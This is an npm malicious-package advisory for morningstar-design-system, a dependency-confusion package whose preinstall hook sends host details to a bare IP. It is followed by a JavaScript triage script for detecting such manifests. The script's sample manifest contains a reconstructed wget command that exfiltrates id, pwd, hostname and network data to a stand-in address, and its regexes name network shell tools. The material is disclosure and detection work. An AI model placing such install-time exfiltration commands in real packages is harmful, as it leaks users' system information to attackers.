{
  "id": "MAL-2026-5449",
  "summary": "Malicious code in morningstar-design-system (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e)\nOn `npm install`, the package's `preinstall` lifecycle script runs `wget` against a hardcoded bare-IP HTTP endpoint, passing the output of `id`, `pwd`, `hostname`, and `ip a` as URL query parameters. This leaks the installing user's username/UID/GID, working directory, hostname, and full network interface configuration to an attacker-controlled host automatically, before any other code runs. The package name targets Morningstar's organizational namespace and is published at an absurd `99.0.1` version — the canonical dependency-confusion shape designed to override an internal package of the same name. README self-identifies as a dependency-confusion PoC. Whether labeled research or not, the published artifact actively exfiltrates installer data to a third-party IP and is unsafe to install in any environment.\n",
  "modified": "2026-06-09T19:01:29.458566023Z",
  "published": "2026-06-09T17:34:46Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "sha256": "18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e",
        "id": "IN-MAL-2026-005075",
        "source": "amazon-inspector",
        "import_time": "2026-06-09T17:45:52.969057726Z",
        "modified_time": "2026-06-09T17:35:31Z",
        "versions": ["99.0.1"]
      },
      {
        "versions": ["99.0.2"],
        "id": "IN-MAL-2026-005066",
        "source": "amazon-inspector",
        "import_time": "2026-06-09T17:45:52.33397188Z",
        "modified_time": "2026-06-09T17:34:46Z",
        "sha256": "b7c142e1dbd0c447de86c8f45555623eec0ca091eb202b435865aaa5688c76de"
      },
      {
        "sha256": "06a27dd57899084595fca32ae35722b70847a43879cb19a17b1d21f95fb6840a",
        "id": "IN-MAL-2026-005123",
        "source": "amazon-inspector",
        "import_time": "2026-06-09T18:50:17.395581784Z",
        "modified_time": "2026-06-09T17:45:56Z",
        "versions": ["99.0.0"]
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/morningstar-design-system/v/99.0.1"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/morningstar-design-system/v/99.0.2"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/morningstar-design-system/v/99.0.0"}
  ],
  "affected": [
    {
      "package": {
        "name": "morningstar-design-system",
        "ecosystem": "npm",
        "purl": "pkg:npm/morningstar-design-system"
      },
      "versions": ["99.0.1", "99.0.2", "99.0.0"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json",
        "indicators": {
          "package_integrity": [
            {
              "filename": "morningstar-design-system-99.0.1.tgz",
              "hashes": {
                "sha1": "fbc61e4d181354b087d7a4032de79a54c8a60af0",
                "sha512_sri": "sha512-mRsaNIScm4W4V3+d8aD0yP2L6SJP1khxHgzZLKbfQjtLgdvzUTL2LthDKCDIZBr1gHl+oomciLUs1ALrhj9r1g=="
              }
            }
          ],
          "evidence_files": [
            {
              "sha256": "c6baf6fd432a663cf231f93848d0286121864c60d167e54e64c6e8c819584fa2",
              "tlsh": "c611ef78d730ad330fe50ae0947a12167673fae78d066c1da6d2100fdb0e9d3207c01a",
              "path": "package.json"
            }
          ]
        },
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code", "cweId": "CWE-506"},
          {"description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code", "cweId": "CWE-506"},
          {"description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code", "cweId": "CWE-506"}
        ]
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["inspector-research@amazon.com"], "type": "FINDER"}
  ]
}
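A worked triage check for the two signals this record describes: a lifecycle script that invokes a network client with host-reconnaissance output substituted into a hardcoded bare-IP URL, and a public package whose name and inflated version are shaped to win resolution over an internal package. This is an added example, not code from the advisory, from Amazon Inspector, or from the package itself. The manifests, the internal-catalog map, the name `acme-design-system` and the address 203.0.113.10 are constructed for illustration; the `preinstall` command is a reconstruction of the behaviour the record describes, not the package's actual script.

```javascript
'use strict';
// Added example: static triage of an npm manifest for the two signals in this
// record. Not code from the advisory or the package; every input below is
// constructed for illustration.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare',
                         'preuninstall', 'postuninstall'];

// Heuristics modelled on the behaviour the record describes. They are signals
// for review, not proof of malice: a lifecycle script that merely calls a
// network client is suspicious; one that also feeds host reconnaissance into a
// bare-IP URL is the exfiltration shape.
const NETWORK_CLIENT = /\b(?:wget|curl|ncat|socat)\b/;
const BARE_IP_URL = /\bhttps?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:[\/?]|\b)/;
const RECON_SUBSTITUTION = /(?:\$\(|`)\s*(?:id|pwd|hostname|whoami|uname|ifconfig|ip\s+a)\b/;

// Returns one finding per lifecycle hook whose command trips a heuristic.
function auditLifecycleScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const reasons = [];
    if (NETWORK_CLIENT.test(command)) reasons.push('network client invoked during install');
    if (BARE_IP_URL.test(command)) reasons.push('hardcoded bare-IP URL');
    if (RECON_SUBSTITUTION.test(command)) reasons.push('host reconnaissance output substituted into command');
    if (reasons.length > 0) findings.push({ hook, command, reasons });
  }
  return findings;
}

// Dependency-confusion check. A public package that reuses an internal name is
// a finding on its own; one whose major version outranks the internal release
// is the shape that wins when a resolver consults both registries.
// internalCatalog: Map of package name -> latest version on the private registry.
function dependencyConfusionRisk(pkg, internalCatalog) {
  const internalVersion = internalCatalog.get(pkg.name);
  if (internalVersion === undefined) return null;
  const major = (v) => Number(String(v).split('.')[0]);
  if (major(pkg.version) > major(internalVersion)) {
    return `public ${pkg.name}@${pkg.version} outranks internal ${internalVersion}`;
  }
  return `public ${pkg.name}@${pkg.version} collides with internal name`;
}

// Constructed manifests. The preinstall command reconstructs the behaviour the
// record describes; it is not the package's real script. 203.0.113.10 is a
// documentation address (TEST-NET-3).
const SAMPLE_MALICIOUS = {
  name: 'acme-design-system',
  version: '99.0.1',
  scripts: {
    preinstall: 'wget -q -O /dev/null "http://203.0.113.10/?u=$(id)&d=$(pwd)&h=$(hostname)&n=$(ip a)"',
  },
};

const SAMPLE_BENIGN = {
  name: 'acme-design-system',
  version: '2.4.1',
  scripts: { postinstall: 'node scripts/build-tokens.js', test: 'jest' },
};

// Constructed stand-in for what the private registry reports as latest.
const INTERNAL_CATALOG = new Map([['acme-design-system', '2.4.1']]);

if (typeof require !== 'undefined' && require.main === module) {
  for (const pkg of [SAMPLE_MALICIOUS, SAMPLE_BENIGN]) {
    console.log(`${pkg.name}@${pkg.version}`);
    console.log('  lifecycle:', JSON.stringify(auditLifecycleScripts(pkg)));
    console.log('  confusion:', dependencyConfusionRisk(pkg, INTERNAL_CATALOG));
  }
}
```

The check only sees commands written directly in `package.json`; a hook that runs `node setup.js` hides the same behaviour in a file the manifest merely references, so treat any network or shell activity at install time as a reason to read the referenced script. The blunt control is to stop lifecycle scripts from running at all during resolution (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and to pin internal names to the private registry with a scoped `@scope:registry=` entry so a public package of the same bare name is never a resolution candidate.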